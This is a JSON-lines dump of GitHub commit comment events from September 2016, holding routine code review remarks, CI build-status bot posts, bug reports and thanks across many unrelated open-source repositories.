{"id":"4599592355","type":"CommitCommentEvent","actor":{"login":"lucaswoj"},"repo":{"name":"mapbox/mapbox-gl-test-suite"},"payload":{"comment":{"id":19122641,"position":null,"line":null,"path":null,"commit_id":"01c2e8d1e7bb7a6b2a58ec0df4816eee21dd8646","created_at":"2016-09-21T23:33:47Z","updated_at":"2016-09-21T23:33:47Z","body":"Yes. Thank you @jfirebaugh "}},"created_at":"2016-09-21T23:33:47Z"}
{"id":"4599596727","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122643,"position":26,"line":43,"path":"components/decorateMapComponent.js","commit_id":"4640109a0ba3e8e86dee769c711543e4eac2704b","created_at":"2016-09-21T23:34:59Z","updated_at":"2016-09-21T23:34:59Z","body":"That's ironic.\r\n\r\nInstead, you could do \r\n\r\n```js\r\n// eslint-disable-next-line no-param-reassign\r\nComponent.prototype.getAirComponent = function getAirComponent() {\r\n```"}},"created_at":"2016-09-21T23:34:59Z"}
{"id":"4599598990","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19122647,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-21T23:35:34Z","updated_at":"2016-09-21T23:35:34Z","body":"I updated to the latest version of visual studio 2015 maybe two months ago and it still didn't work then.  Try to compile all the examples and you will probably find that it doesn't work yet.  "}},"created_at":"2016-09-21T23:35:34Z"}
{"id":"4599603919","type":"CommitCommentEvent","actor":{"login":"fadookie"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19122668,"position":12,"line":107,"path":"docs/Images.md","commit_id":"7b2cd03d6a1336b310a0caf71a12374e5dcb805e","created_at":"2016-09-21T23:36:58Z","updated_at":"2016-09-21T23:36:58Z","body":"@frantic I'm wary of doing so as I am not sure how volatile the current behavior I discovered is. What would be better is a more \"official\" API to query an image's metadata... unless `resolveAssetSource` really is intended to be part of the public react-native API (to me it seems more like an internal.)"}},"created_at":"2016-09-21T23:36:58Z"}
{"id":"4599606606","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122677,"position":42,"line":128,"path":"python/gps/utility/visualization.py","commit_id":"ac5eeeb950efa8fbeb39df88bf48957b6c459a06","created_at":"2016-09-21T23:37:46Z","updated_at":"2016-09-21T23:37:46Z","body":"These things should not be hard-coded. They should be in the hyperparams file."}},"created_at":"2016-09-21T23:37:46Z"}
{"id":"4599607793","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122685,"position":48,"line":134,"path":"python/gps/utility/visualization.py","commit_id":"ac5eeeb950efa8fbeb39df88bf48957b6c459a06","created_at":"2016-09-21T23:38:08Z","updated_at":"2016-09-21T23:38:08Z","body":"This filename should not be hard-coded."}},"created_at":"2016-09-21T23:38:08Z"}
{"id":"4599608245","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"Ad5001/CommandBlocks"},"payload":{"comment":{"id":19122687,"position":null,"line":null,"path":null,"commit_id":"03951f82358e26cfa9993f42e4137e71215cfd99","created_at":"2016-09-21T23:38:14Z","updated_at":"2016-09-21T23:38:14Z","body":":P"}},"created_at":"2016-09-21T23:38:14Z"}
{"id":"4599608349","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122688,"position":55,"line":141,"path":"python/gps/utility/visualization.py","commit_id":"ac5eeeb950efa8fbeb39df88bf48957b6c459a06","created_at":"2016-09-21T23:38:16Z","updated_at":"2016-09-21T23:38:16Z","body":"ditto for this code."}},"created_at":"2016-09-21T23:38:16Z"}
{"id":"4599609898","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122697,"position":121,"line":191,"path":"python/gps/utility/visualization.py","commit_id":"ac5eeeb950efa8fbeb39df88bf48957b6c459a06","created_at":"2016-09-21T23:38:44Z","updated_at":"2016-09-21T23:38:44Z","body":"This legend code shouldn't be hard-coded."}},"created_at":"2016-09-21T23:38:44Z"}
{"id":"4599611570","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19122702,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-21T23:39:13Z","updated_at":"2016-09-21T23:39:13Z","body":"It is sufficient to prove equality with just `<`, assuming that the implementation of `<` is sensible when it comes to defining some type of order (Note that `NaN` has weird properties where `NaN != NaN`)\r\n\r\nIf `a < b` is false and `b < a` is false, then we know that `a == b`. Generally, you don't care about equality, unless you want to provide some guarantee of \"stability\" in your data structure sorting order."}},"created_at":"2016-09-21T23:39:13Z"}
{"id":"4599613144","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122705,"position":137,"line":137,"path":"python/gps/utility/visualization.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-21T23:39:41Z","updated_at":"2016-09-21T23:39:41Z","body":"this shouldn't be hard-coded here."}},"created_at":"2016-09-21T23:39:41Z"}
{"id":"4599613729","type":"CommitCommentEvent","actor":{"login":"ayee"},"repo":{"name":"olegklymchuk/projects"},"payload":{"comment":{"id":19122707,"position":45,"line":45,"path":"ml/ok-ml-lib/src/main/scala/ok/ml/App.scala","commit_id":"02aaa935164ddcae07883f310401e77e28009709","created_at":"2016-09-21T23:39:51Z","updated_at":"2016-09-21T23:39:51Z","body":"I think you should just pass the broadcast variables instead of instantiate the broadcast variables in KNN.knn() function, or pass in the original variables and create broadcast in KNN.knn(), but not both"}},"created_at":"2016-09-21T23:39:51Z"}
{"id":"4599616275","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122713,"position":178,"line":178,"path":"python/gps/utility/visualization.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-21T23:40:33Z","updated_at":"2016-09-21T23:40:33Z","body":"remove commented out code."}},"created_at":"2016-09-21T23:40:33Z"}
{"id":"4599616932","type":"CommitCommentEvent","actor":{"login":"kc651099"},"repo":{"name":"kc651099/Basic-R-Code"},"payload":{"comment":{"id":19122716,"position":null,"line":null,"path":null,"commit_id":"396050f2b1b3db638847c5a0ed7e0f29cff24e21","created_at":"2016-09-21T23:40:44Z","updated_at":"2016-09-21T23:40:44Z","body":"[week2_assignment_1.docx](https://github.com/kc651099/Basic-R-Code/files/486265/week2_assignment_1.docx)\r\n"}},"created_at":"2016-09-21T23:40:44Z"}
{"id":"4599618102","type":"CommitCommentEvent","actor":{"login":"kc651099"},"repo":{"name":"kc651099/Basic-R-Code"},"payload":{"comment":{"id":19122721,"position":null,"line":null,"path":null,"commit_id":"396050f2b1b3db638847c5a0ed7e0f29cff24e21","created_at":"2016-09-21T23:41:03Z","updated_at":"2016-09-21T23:41:03Z","body":"Week 2 Assignment"}},"created_at":"2016-09-21T23:41:03Z"}
{"id":"4599618518","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122723,"position":80,"line":80,"path":"python/gps/utility/visualization.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-21T23:41:10Z","updated_at":"2016-09-21T23:41:10Z","body":"can you make this more concise?"}},"created_at":"2016-09-21T23:41:10Z"}
{"id":"4599619559","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122724,"position":6,"line":195,"path":"experiments/mjc_mdgps_ioc_example/hyperparams.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-21T23:41:28Z","updated_at":"2016-09-21T23:41:28Z","body":"We use ICML now, right?"}},"created_at":"2016-09-21T23:41:28Z"}
{"id":"4599620209","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122726,"position":23,"line":218,"path":"experiments/mjc_mdgps_ioc_example/hyperparams.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-21T23:41:39Z","updated_at":"2016-09-21T23:41:39Z","body":"we default to a global cost right?"}},"created_at":"2016-09-21T23:41:39Z"}
{"id":"4599620808","type":"CommitCommentEvent","actor":{"login":"rpeyron"},"repo":{"name":"rpeyron/location-history-json-converter"},"payload":{"comment":{"id":19122728,"position":null,"line":null,"path":null,"commit_id":"31926c72216534648bc6c6f774a7ac6d9ee73024","created_at":"2016-09-21T23:41:51Z","updated_at":"2016-09-21T23:41:51Z","body":"The previous version was intended to not rewrite items array when just filtering date and thus, be more performant for this case.\r\n\r\nIt was theoritical, so I made a test, raw results below ; it turns out that : \r\n- that is true, but mostly not relevant (94.85 vs 95.00), and this case may not be the most frequent\r\n- the test in the previous version was very costly (285 vs 253), because it called the function even and check each time if start or end arguments was set\r\n\r\nAnd furthermore, this is cleaner and more maintainable :)\r\n\r\n-----\r\n\r\n-rw-r--r-- 1 remi remi 272M sept. 17 05:12 Historiquedespositions.json\r\n(with gpstracks format)\r\n\r\nPrevious version :\r\n\r\nTimeIt with args '' =  285.819180965\r\nTimeIt with args '-c' =  290.14854002\r\nTimeIt with args '-s 2016-09-01' =  94.8555910587\r\nTimeIt with args '-c -s 2016-09-01' =  95.1921539307\r\n\r\n\r\nNew version :\r\n\r\nTimeIt with args '' =  253.932356119\r\nTimeIt with args '-c' =  257.172684193\r\nTimeIt with args '-s 2016-09-01' =  95.0004169941\r\nTimeIt with args '-c -s 2016-09-01' =  95.1699018478\r\n\r\n"}},"created_at":"2016-09-21T23:41:51Z"}
{"id":"4599622016","type":"CommitCommentEvent","actor":{"login":"kc651099"},"repo":{"name":"kc651099/Basic-R-Code"},"payload":{"comment":{"id":19122731,"position":null,"line":null,"path":null,"commit_id":"396050f2b1b3db638847c5a0ed7e0f29cff24e21","created_at":"2016-09-21T23:42:12Z","updated_at":"2016-09-21T23:42:12Z","body":"[week2_assignment_2.docx](https://github.com/kc651099/Basic-R-Code/files/486269/week2_assignment_2.docx)\r\n"}},"created_at":"2016-09-21T23:42:12Z"}
{"id":"4599622340","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19122734,"position":63,"line":63,"path":"acceptance/tests/options/config_file/ttls.rb","commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T23:42:18Z","updated_at":"2016-09-21T23:42:18Z","body":"good call...thanks!"}},"created_at":"2016-09-21T23:42:18Z"}
{"id":"4599623098","type":"CommitCommentEvent","actor":{"login":"alexeagle"},"repo":{"name":"panuhorsmalahti/gulp-tslint"},"payload":{"comment":{"id":19122737,"position":null,"line":null,"path":null,"commit_id":"da6024a09b6d96d1b12079e47eeadde6e6c72681","created_at":"2016-09-21T23:42:33Z","updated_at":"2016-09-21T23:42:33Z","body":"This doesn't work for me:\r\n```\r\nTypeError: Cannot use 'in' operator to search for 'resolvedModules' in undefined\r\n    at MultiLinter.lint (/Users/alexeagle/Projects/angular/node_modules/tslint/lib/tslintMulti.js:40:40)\r\n    at Linter.lint (/Users/alexeagle/Projects/angular/node_modules/tslint/lib/tslint.js:20:21)\r\n    at /Users/alexeagle/Projects/angular/node_modules/gulp-tslint/index.js:104:30\r\n```\r\n\r\nThe reason is that tslint sees files which are not in the `ts.Program`. The `program.getSourceFiles()` should be the files to lint, when a program is available.\r\n\r\nSee how the files are defaulted to be those in the program in the CLI:\r\nhttps://github.com/palantir/tslint/blob/master/src/tslint-cli.ts#L275"}},"created_at":"2016-09-21T23:42:33Z"}
{"id":"4599623181","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122738,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T23:42:35Z","updated_at":"2016-09-21T23:42:35Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T23:42:35Z"}
{"id":"4599623906","type":"CommitCommentEvent","actor":{"login":"ChrisRus"},"repo":{"name":"Hyzual/knotsjs"},"payload":{"comment":{"id":19122742,"position":21,"line":21,"path":"lib/dependencies.js","commit_id":"4e1d556f82b35ea7da494000cef08c5025fdb9fc","created_at":"2016-09-21T23:42:48Z","updated_at":"2016-09-21T23:42:48Z","body":"v0.7 jsgraph is published: https://www.npmjs.com/package/jsgraph"}},"created_at":"2016-09-21T23:42:48Z"}
{"id":"4599625789","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122747,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T23:43:25Z","updated_at":"2016-09-21T23:43:25Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T23:43:25Z"}
{"id":"4599633406","type":"CommitCommentEvent","actor":{"login":"espenalb"},"repo":{"name":"reportunit/reportunit"},"payload":{"comment":{"id":19122775,"position":null,"line":null,"path":null,"commit_id":"89d14439949e74884532b5c16701c0747f4039c2","created_at":"2016-09-21T23:45:41Z","updated_at":"2016-09-21T23:45:41Z","body":"Sorry. Just replace it with string.format....\n\nEspen\n\n________________________________\nFra: ariyuan <notifications@github.com>\nSendt: 21. sep. 2016 07.58\nTil: reportunit/reportunit\nKopi: Espen Albrektsen; Author\nEmne: Re: [reportunit/reportunit] Include NUnit output element at fixture level in the StatusMessage (89d1443)\n\n\nso here the code \"$\"\\n\\nOutput:\\n\"\" is a new feature in c# 6.0? I can not get it compiled with my vs 2013....\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/reportunit/reportunit/commit/89d14439949e74884532b5c16701c0747f4039c2#commitcomment-19108530>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFOQWtA8-FSyQ5P4TWu38F4dr2Zp0fizks5qsMeJgaJpZM4KCbb_>.\n"}},"created_at":"2016-09-21T23:45:41Z"}
{"id":"4599641042","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19122804,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T23:47:55Z","updated_at":"2016-09-21T23:47:55Z","body":"iteration (evanweaver) - i386-Windows-7-VisualStudio-12: Tests Failed (2159 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.19%25-red.svg)</a> \n"}},"created_at":"2016-09-21T23:47:55Z"}
{"id":"4599641776","type":"CommitCommentEvent","actor":{"login":"evernife"},"repo":{"name":"untamemadman/TakeMeHome"},"payload":{"comment":{"id":19122806,"position":null,"line":null,"path":null,"commit_id":"4095422a1c616f9e2019cc25b8bc321b5fc6a7e5","created_at":"2016-09-21T23:48:09Z","updated_at":"2016-09-21T23:48:09Z","body":"Work with Authme (Offline-servers?)\r\n\r\nWhat minecraft version is this plugin for?"}},"created_at":"2016-09-21T23:48:09Z"}
{"id":"4599652748","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-swagger"},"payload":{"comment":{"id":19122835,"position":null,"line":null,"path":null,"commit_id":"d2833dad8dab7112c0910ebeb9f3f5b684fa9a58","created_at":"2016-09-21T23:51:26Z","updated_at":"2016-09-21T23:51:26Z","body":"And update to ^3.0.0-alpha.8"}},"created_at":"2016-09-21T23:51:26Z"}
{"id":"4599655302","type":"CommitCommentEvent","actor":{"login":"untamemadman"},"repo":{"name":"untamemadman/TakeMeHome"},"payload":{"comment":{"id":19122843,"position":null,"line":null,"path":null,"commit_id":"4095422a1c616f9e2019cc25b8bc321b5fc6a7e5","created_at":"2016-09-21T23:52:13Z","updated_at":"2016-09-21T23:52:13Z","body":"This is not my plugin. It was a fork from elsewhere and was only changed for the purposes of the MultiCubeUK server. However it was written for Minecraft 1.7.10 and I believe we used another method instead of UUIDProvider as MultiCubeUK was a multiserver network running BungeeCord so the servers were in offline mode"}},"created_at":"2016-09-21T23:52:13Z"}
{"id":"4599665503","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19122876,"position":null,"line":null,"path":null,"commit_id":"be7fb40ea3e0815e88e6e13c1210459e2f0214e5","created_at":"2016-09-21T23:55:14Z","updated_at":"2016-09-21T23:55:14Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=78)"}},"created_at":"2016-09-21T23:55:14Z"}
{"id":"4599665506","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19122877,"position":null,"line":null,"path":null,"commit_id":"1ad3028111d1c0ab503b7bca41ad537b25a696bc","created_at":"2016-09-21T23:55:14Z","updated_at":"2016-09-21T23:55:14Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=78)"}},"created_at":"2016-09-21T23:55:14Z"}
{"id":"4599665559","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19122878,"position":null,"line":null,"path":null,"commit_id":"f95ca5f50d8afd9ad16ee8cdb070037734921d18","created_at":"2016-09-21T23:55:15Z","updated_at":"2016-09-21T23:55:15Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=78)"}},"created_at":"2016-09-21T23:55:15Z"}
{"id":"4599666784","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":19122884,"position":null,"line":null,"path":null,"commit_id":"ff9af915a0b221d90b250224fd7b2c942dc56c6f","created_at":"2016-09-21T23:55:37Z","updated_at":"2016-09-21T23:55:37Z","body":"Marking this commit as **staging**, might lead to workqueue issues."}},"created_at":"2016-09-21T23:55:37Z"}
{"id":"4599667491","type":"CommitCommentEvent","actor":{"login":"peaveyman"},"repo":{"name":"NuLogicSystems/PKGBUILD"},"payload":{"comment":{"id":19122889,"position":null,"line":null,"path":null,"commit_id":"511968003bd1d630d74aa7fda6a5357c78199adc","created_at":"2016-09-21T23:55:49Z","updated_at":"2016-09-21T23:55:49Z","body":"Is this just for use with wayland? I noticed the pkgrel changed back to 2."}},"created_at":"2016-09-21T23:55:49Z"}
{"id":"4599670238","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-csslint"},"payload":{"comment":{"id":19122895,"position":null,"line":null,"path":null,"commit_id":"def72ff7293be08de49de32fdf971d87bea9b8f1","created_at":"2016-09-21T23:56:32Z","updated_at":"2016-09-21T23:56:32Z","body":"@vladikoff: please publish this to npm."}},"created_at":"2016-09-21T23:56:32Z"}
{"id":"4599677242","type":"CommitCommentEvent","actor":{"login":"BoPeng"},"repo":{"name":"BoPeng/SOS"},"payload":{"comment":{"id":19122920,"position":null,"line":null,"path":null,"commit_id":"c307066134cf838ff3a2c2db3bfaa7896c9caeaf","created_at":"2016-09-21T23:58:37Z","updated_at":"2016-09-21T23:58:37Z","body":"I know we have discussed this before but `config.yaml` contains project-specific settings that are not strictly \"runtime\" or \"hidden\", and I frequently remove `.sos` for testing / debugging purposes. "}},"created_at":"2016-09-21T23:58:37Z"}
{"id":"4599677364","type":"CommitCommentEvent","actor":{"login":"Sumukh"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":19122921,"position":11,"line":94,"path":"server/utils.py","commit_id":"08ff4a41774c0c9a0fbff93e83bc80574191a6b6","created_at":"2016-09-21T23:58:39Z","updated_at":"2016-09-21T23:58:39Z","body":"Do you think it makes sense to do the `.title()` here?"}},"created_at":"2016-09-21T23:58:39Z"}
{"id":"4599679012","type":"CommitCommentEvent","actor":{"login":"DougGregor"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19122925,"position":120,"line":2051,"path":"lib/Sema/TypeCheckConstraintsApply.cpp","commit_id":"6804b235640914c0d88775bcf0edf0a2c42ad468","created_at":"2016-09-21T23:59:07Z","updated_at":"2016-09-21T23:59:07Z","body":"It's been three years, how should I know?!?!?!\r\n\r\nI would have expected to record the field there..."}},"created_at":"2016-09-21T23:59:07Z"}
{"id":"4593772470","type":"CommitCommentEvent","actor":{"login":"max-konin"},"repo":{"name":"KernelCorp/kvartiroom"},"payload":{"comment":{"id":19107487,"position":4,"line":80,"path":"frontend/-shared/app/mixins/models/realty.coffee","commit_id":"40a4e101138a56e26feeac58c328060f9df351c5","created_at":"2016-09-21T03:00:21Z","updated_at":"2016-09-21T03:00:21Z","body":"неправильное именование класса в объявлении связи см exchangeOptions"}},"created_at":"2016-09-21T03:00:21Z"}
{"id":"4593774049","type":"CommitCommentEvent","actor":{"login":"ngraymon"},"repo":{"name":"ckwatson/kernel"},"payload":{"comment":{"id":19107491,"position":null,"line":null,"path":null,"commit_id":"de1bff0a73a9c3e7d9599f1ec00eff7fd7bb3d1d","created_at":"2016-09-21T03:00:52Z","updated_at":"2016-09-21T03:00:52Z","body":"fixes #2 "}},"created_at":"2016-09-21T03:00:52Z"}
{"id":"4593777584","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19107496,"position":null,"line":null,"path":null,"commit_id":"8f992eac6637d0f18045c435e894441a08607807","created_at":"2016-09-21T03:02:08Z","updated_at":"2016-09-21T03:02:08Z","body":":tada: \r\nDocumentation?"}},"created_at":"2016-09-21T03:02:08Z"}
{"id":"4593784205","type":"CommitCommentEvent","actor":{"login":"Kxiansheng"},"repo":{"name":"Kxiansheng/xiaoke"},"payload":{"comment":{"id":19107508,"position":null,"line":null,"path":null,"commit_id":"62216d1a73d49c2d6b39f4f87f13be040e458189","created_at":"2016-09-21T03:04:15Z","updated_at":"2016-09-21T03:04:15Z","body":"index.html"}},"created_at":"2016-09-21T03:04:15Z"}
{"id":"4593790395","type":"CommitCommentEvent","actor":{"login":"MatthewJA"},"repo":{"name":"chengsoonong/crowdastro"},"payload":{"comment":{"id":19107525,"position":null,"line":null,"path":null,"commit_id":"cfd5a97691652c51e6b33c42b34c6533f724c7b9","created_at":"2016-09-21T03:06:36Z","updated_at":"2016-09-21T03:06:36Z","body":"Thanks!"}},"created_at":"2016-09-21T03:06:36Z"}
{"id":"4593795868","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107536,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T03:08:40Z","updated_at":"2016-09-21T03:08:40Z","body":"I disagree it's breakiing, if anything it's fixing. Ok i'll change it now to a warning plus auto-limit,\r\n15 is so widespread and likely to persist for months and not everyone knows how to edit mods,"}},"created_at":"2016-09-21T03:08:40Z"}
{"id":"4593800619","type":"CommitCommentEvent","actor":{"login":"phuckhoi2494"},"repo":{"name":"phuckhoi2494/Khoi"},"payload":{"comment":{"id":19107544,"position":null,"line":null,"path":null,"commit_id":"2b869b42c8acc9a6e18d57c384a329c107a7b5b1","created_at":"2016-09-21T03:10:31Z","updated_at":"2016-09-21T03:10:31Z","body":"Hello World!"}},"created_at":"2016-09-21T03:10:31Z"}
{"id":"4593803833","type":"CommitCommentEvent","actor":{"login":"mhmorales"},"repo":{"name":"ckrack/scrollsnap-polyfill"},"payload":{"comment":{"id":19107551,"position":null,"line":null,"path":null,"commit_id":"abef2a725bf4a0f3681819d0f4adc750588f9998","created_at":"2016-09-21T03:11:49Z","updated_at":"2016-09-21T03:11:49Z","body":"0 comments on commit abef2a7\r\n"}},"created_at":"2016-09-21T03:11:49Z"}
{"id":"4593805871","type":"CommitCommentEvent","actor":{"login":"taozhuIT"},"repo":{"name":"taozhuIT/taozhu"},"payload":{"comment":{"id":19107555,"position":3,"line":3,"path":"README.md","commit_id":"53bffa03c8b7693cbde3c95095af5164a8824df8","created_at":"2016-09-21T03:12:38Z","updated_at":"2016-09-21T03:12:38Z","body":"我正在学习如何使用Git"}},"created_at":"2016-09-21T03:12:38Z"}
{"id":"4593806896","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19107556,"position":null,"line":null,"path":null,"commit_id":"0f6fa3becfbcd310520bb122ad8bd058ec447f87","created_at":"2016-09-21T03:13:04Z","updated_at":"2016-09-21T03:13:04Z","body":"these last days i've been doing some \"sensitive\" changes, and they all seem to work fine in my precise derivative and slacko 700 alpha. so probably now the a full install can be announced as something that works... also pupswap and underdog (found in Boot Manager).\r\n\r\nopinions...... a swapfile should be loaded even if a swap partition was found and loaded? that's the question, because the swapfile stuff is hidden unless you don't have a swap partition, i don't have one, and it feels like a swapfile in the same partition even increased performance a little, at least loading a heavy page in a s.l.o.w machine i see a difference"}},"created_at":"2016-09-21T03:13:04Z"}
{"id":"4593807333","type":"CommitCommentEvent","actor":{"login":"joshuaknox"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19107558,"position":null,"line":null,"path":null,"commit_id":"a62da5bac9eeee8f4802acd868fbc77427fd5b91","created_at":"2016-09-21T03:13:14Z","updated_at":"2016-09-21T03:13:14Z","body":"@dakrone awesome, thanks for the quick turn-around!  \r\n\r\n"}},"created_at":"2016-09-21T03:13:14Z"}
{"id":"4593808639","type":"CommitCommentEvent","actor":{"login":"damiansb"},"repo":{"name":"damiansb/dbo"},"payload":{"comment":{"id":19107560,"position":null,"line":null,"path":null,"commit_id":"0aef3328c886b7bdf7cd7f01ed2c948cc15fee9d","created_at":"2016-09-21T03:13:45Z","updated_at":"2016-09-21T03:13:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;AZaDBb2l&#x2F;65-alteracoes-no-dbo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Alterações no DBO</a>"}},"created_at":"2016-09-21T03:13:45Z"}
{"id":"4593808695","type":"CommitCommentEvent","actor":{"login":"JovnToist"},"repo":{"name":"JovnToist/openresty-best-practices"},"payload":{"comment":{"id":19107561,"position":null,"line":null,"path":null,"commit_id":"c29e705750b5ecb905bdbaacebf8c9efd1aa4182","created_at":"2016-09-21T03:13:47Z","updated_at":"2016-09-21T03:13:47Z","body":"调整注释内容，避免误导"}},"created_at":"2016-09-21T03:13:47Z"}
{"id":"4593809680","type":"CommitCommentEvent","actor":{"login":"marcellapantarotto"},"repo":{"name":"marcellapantarotto/converting_romans"},"payload":{"comment":{"id":19107565,"position":null,"line":null,"path":null,"commit_id":"9853653c8f504f643ff8d5cb4ed7490bc32dd12b","created_at":"2016-09-21T03:14:09Z","updated_at":"2016-09-21T03:14:09Z","body":"Código realizando os cálculos, mas com alguns bugs:\r\n\t- inserindo frações (ex: 0.5): loop infinto\r\n\t- posso inserir numeros romanos invalidos, que sao calculados (ex: IIIIIII = 7)\r\n\t- input: ILA = 98\r\n\t- input: 0 = loop infinito"}},"created_at":"2016-09-21T03:14:09Z"}
